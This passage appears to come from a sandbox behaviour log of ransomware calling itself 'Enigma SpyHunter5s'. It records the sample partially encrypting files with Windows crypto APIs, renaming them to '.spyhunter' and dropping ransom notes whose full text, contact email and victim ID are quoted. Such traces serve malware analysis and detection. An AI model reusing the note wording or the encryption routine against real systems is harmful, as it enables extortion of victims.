lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x57fe44*=0x2800, lpOverlapped=0x0) returned 1 [0089.906] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.906] WriteFile (in: hFile=0x17c, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x57fe44*=0x2800, lpOverlapped=0x0) returned 1 [0089.906] GetProcessHeap () returned 0x2c0000 [0089.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0089.906] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.907] WriteFile (in: hFile=0x17c, lpBuffer=0x57fe84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x57fe84*, lpNumberOfBytesWritten=0x57fe44*=0x4, lpOverlapped=0x0) returned 1 [0089.912] WriteFile (in: hFile=0x17c, lpBuffer=0x32f8d8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe44, lpOverlapped=0x0 | out: lpBuffer=0x32f8d8*, lpNumberOfBytesWritten=0x57fe44*=0x30, lpOverlapped=0x0) returned 1 [0089.912] CloseHandle (hObject=0x17c) returned 1 [0089.991] GetProcessHeap () returned 0x2c0000 [0089.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0089.992] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.spyhunter") returned 81 [0089.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv.spyhunter")) returned 1 [0089.992] GetProcessHeap () returned 0x2c0000 [0089.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0089.992] GetProcessHeap () returned 0x2c0000 [0089.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f8d8 | out: hHeap=0x2c0000) returned 1 [0089.992] GetProcessHeap () returned 0x2c0000 [0089.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e050 | out: hHeap=0x2c0000) returned 1 [0089.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.996] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0089.996] WriteFile (in: hFile=0x15c, lpBuffer=0x57fdb7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fee0, lpOverlapped=0x0 | out: lpBuffer=0x57fdb7*, lpNumberOfBytesWritten=0x57fee0*=0x127, lpOverlapped=0x0) returned 1 [0089.997] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0089.997] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fee0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fee0*=0x2ac, lpOverlapped=0x0) returned 1 [0089.997] CloseHandle (hObject=0x15c) returned 1 [0089.997] GetProcessHeap () returned 0x2c0000 [0089.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x343de8 | out: hHeap=0x2c0000) returned 1 [0089.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe80 | out: pbBuffer=0x57fe80) returned 1 [0089.997] GetProcessHeap () returned 0x2c0000 [0089.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0089.998] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe78*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe78*=0x30) returned 1 [0089.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0090.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 77 [0090.131] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.131] GetProcessHeap () returned 0x2c0000 [0090.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0090.131] ReadFile (in: hFile=0x17c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe3c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x57fe3c*=0x2800, lpOverlapped=0x0) returned 1 [0090.225] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.225] WriteFile (in: hFile=0x17c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe3c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x57fe3c*=0x2800, lpOverlapped=0x0) returned 1 [0090.226] GetProcessHeap () returned 0x2c0000 [0090.226] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0090.226] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.226] WriteFile (in: hFile=0x17c, lpBuffer=0x57fe7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe3c, lpOverlapped=0x0 | out: lpBuffer=0x57fe7c*, lpNumberOfBytesWritten=0x57fe3c*=0x4, lpOverlapped=0x0) returned 1 [0090.324] WriteFile (in: hFile=0x17c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe3c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe3c*=0x30, lpOverlapped=0x0) returned 1 [0090.325] CloseHandle (hObject=0x17c) returned 1 [0090.326] GetProcessHeap () returned 0x2c0000 [0090.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.326] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.spyhunter") returned 87 [0090.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.spyhunter")) returned 1 [0090.326] GetProcessHeap () returned 0x2c0000 [0090.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.326] GetProcessHeap () returned 0x2c0000 [0090.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0090.326] GetProcessHeap () returned 0x2c0000 [0090.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3744d0 | out: hHeap=0x2c0000) returned 1 [0090.327] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe78 | out: pbBuffer=0x57fe78) returned 1 [0090.327] GetProcessHeap () returned 0x2c0000 [0090.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0090.327] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe70*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe70*=0x30) returned 1 [0090.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0090.379] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG") returned 80 [0090.379] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.379] GetProcessHeap () returned 0x2c0000 [0090.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0090.379] ReadFile (in: hFile=0x17c, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe34, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x57fe34*=0x2800, lpOverlapped=0x0) returned 1 [0090.411] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.411] WriteFile (in: hFile=0x17c, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe34, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x57fe34*=0x2800, lpOverlapped=0x0) returned 1 [0090.411] GetProcessHeap () returned 0x2c0000 [0090.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0090.411] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.411] WriteFile (in: hFile=0x17c, lpBuffer=0x57fe74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe34, lpOverlapped=0x0 | out: lpBuffer=0x57fe74*, lpNumberOfBytesWritten=0x57fe34*=0x4, lpOverlapped=0x0) returned 1 [0090.412] WriteFile (in: hFile=0x17c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe34, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe34*=0x30, lpOverlapped=0x0) returned 1 [0090.412] CloseHandle (hObject=0x17c) returned 1 [0090.413] GetProcessHeap () returned 0x2c0000 [0090.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.413] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.spyhunter") returned 90 [0090.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\thmbnail.png.spyhunter")) returned 1 [0090.414] GetProcessHeap () returned 0x2c0000 [0090.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0090.414] GetProcessHeap () returned 0x2c0000 [0090.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0090.414] GetProcessHeap () returned 0x2c0000 [0090.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x344748 | out: hHeap=0x2c0000) returned 1 [0090.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0090.414] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0090.415] WriteFile (in: hFile=0x17c, lpBuffer=0x57fdab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fed4, lpOverlapped=0x0 | out: lpBuffer=0x57fdab*, lpNumberOfBytesWritten=0x57fed4*=0x127, lpOverlapped=0x0) returned 1 [0090.416] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0090.416] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fed4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fed4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.416] CloseHandle (hObject=0x17c) returned 1 [0090.416] GetProcessHeap () returned 0x2c0000 [0090.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x344bf8 | out: hHeap=0x2c0000) returned 1 [0090.416] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe70 | out: pbBuffer=0x57fe70) returned 1 [0090.417] GetProcessHeap () returned 0x2c0000 [0090.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0090.417] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe68*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe68*=0x30) returned 1 [0090.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0090.427] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 77 [0090.427] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0090.427] GetProcessHeap () returned 0x2c0000 [0090.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0090.428] ReadFile (in: hFile=0x170, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe2c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x57fe2c*=0x2800, lpOverlapped=0x0) returned 1 [0090.450] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.451] WriteFile (in: hFile=0x170, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fe2c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x57fe2c*=0x2800, lpOverlapped=0x0) returned 1 [0090.451] GetProcessHeap () returned 0x2c0000 [0090.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0090.451] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.451] WriteFile (in: hFile=0x170, lpBuffer=0x57fe6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe2c, lpOverlapped=0x0 | out: lpBuffer=0x57fe6c*, lpNumberOfBytesWritten=0x57fe2c*=0x4, lpOverlapped=0x0) returned 1 [0090.451] WriteFile (in: hFile=0x170, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe2c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe2c*=0x30, lpOverlapped=0x0) returned 1 [0090.451] CloseHandle (hObject=0x170) returned 1 [0090.454] GetProcessHeap () returned 0x2c0000 [0090.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.455] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.spyhunter") returned 87 [0090.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.spyhunter")) returned 1 [0090.491] GetProcessHeap () returned 0x2c0000 [0090.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0090.491] GetProcessHeap () returned 0x2c0000 [0090.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0090.491] GetProcessHeap () returned 0x2c0000 [0090.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x374ec8 | out: hHeap=0x2c0000) returned 1 [0090.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe70 | out: pbBuffer=0x57fe70) returned 1 [0090.491] GetProcessHeap () returned 0x2c0000 [0090.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0090.491] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe68*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe68*=0x30) returned 1 [0090.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.574] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF") returned 71 [0090.574] StrStrW (lpFirst="ICE.INF", lpSrch=".txt") returned 0x0 [0090.574] GetProcessHeap () returned 0x2c0000 [0090.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0090.574] ReadFile (in: hFile=0x178, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe2c, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x57fe2c*=0x1ad, lpOverlapped=0x0) returned 1 [0090.575] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.575] WriteFile (in: hFile=0x178, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x1ad, lpNumberOfBytesWritten=0x57fe2c, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesWritten=0x57fe2c*=0x1ad, lpOverlapped=0x0) returned 1 [0090.575] GetProcessHeap () returned 0x2c0000 [0090.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a078 | out: hHeap=0x2c0000) returned 1 [0090.577] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.577] WriteFile (in: hFile=0x178, lpBuffer=0x57fe6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fe2c, lpOverlapped=0x0 | out: lpBuffer=0x57fe6c*, lpNumberOfBytesWritten=0x57fe2c*=0x4, lpOverlapped=0x0) returned 1 [0090.577] WriteFile (in: hFile=0x178, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fe2c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x57fe2c*=0x30, lpOverlapped=0x0) returned 1 [0090.577] CloseHandle (hObject=0x178) returned 1 [0090.578] GetProcessHeap () returned 0x2c0000 [0090.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.579] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF.spyhunter") returned 81 [0090.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\ICE.INF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\ice.inf.spyhunter")) returned 1 [0090.579] GetProcessHeap () returned 0x2c0000 [0090.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0090.579] GetProcessHeap () returned 0x2c0000 [0090.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0090.579] GetProcessHeap () returned 0x2c0000 [0090.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e128 | out: hHeap=0x2c0000) returned 1 [0090.580] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fe68 | out: pbBuffer=0x57fe68) returned 1 [0090.580] GetProcessHeap () returned 0x2c0000 [0090.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0090.580] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x57fe60*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x57fe60*=0x30) returned 1 [0090.580] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0090.580] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 79 [0090.580] StrStrW (lpFirst="JOURNAL.INF", lpSrch=".txt") returned 0x0 [0090.580] GetProcessHeap () returned 0x2c0000 [0090.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34a078 [0090.580] ReadFile (in: hFile=0x178, lpBuffer=0x34a078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fe24, lpOverlapped=0x0 | out: lpBuffer=0x34a078*, lpNumberOfBytesRead=0x57fe24*=0x1f3, lpOverlapped=0x0) returned 1 [0090.582] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.582] WriteFile (in: hFile=0x178, lpBuffer=0x34a078*, nNumberOfBytesToWrite=0x1f3, lpNumberOfBytesWritten=0x57fe24, 